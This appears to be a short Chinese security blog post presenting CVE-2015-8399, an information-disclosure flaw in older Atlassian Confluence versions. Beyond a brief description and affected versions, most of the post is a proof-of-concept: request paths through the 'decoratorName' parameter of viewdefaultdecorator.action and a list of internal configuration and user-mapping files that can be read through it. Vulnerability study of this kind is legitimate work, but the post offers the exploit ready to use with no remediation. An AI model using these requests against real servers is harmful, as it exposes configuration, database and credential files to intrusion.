【初级】confluence 信息泄露

CVE-2015-8399

漏洞描述:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。

Atlassian Confluence 5.8.17之前版本中存在安全,该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过滤‘decoratorName’参数。远程攻击者可利用该漏洞读取配置文件。

影响版本:5.2 / 5.8.14 / 5.8.15

POC:

[PoC]
http:///spaces/viewdefaultdecorator.action?decoratorName=
http:///admin/viewdefaultdecorator.action?decoratorName=

        This is an example of accepted  parameters
        /WEB-INF/decorators.xml
        /WEB-INF/glue-config.xml
        /WEB-INF/server-config.wsdd
        /WEB-INF/sitemesh.xml
        /WEB-INF/urlrewrite.xml
        /WEB-INF/web.xml
        /databaseSubsystemContext.xml
        /securityContext.xml
        /services/statusServiceContext.xml
        com/atlassian/confluence/security/SpacePermission.hbm.xml
        com/atlassian/confluence/user/OSUUser.hbm.xml
        com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
        com/atlassian/confluence/user/ConfluenceUser.hbm.xml
© 版权声明
THE END
喜欢就支持一下吧
点赞8赏点小钱 分享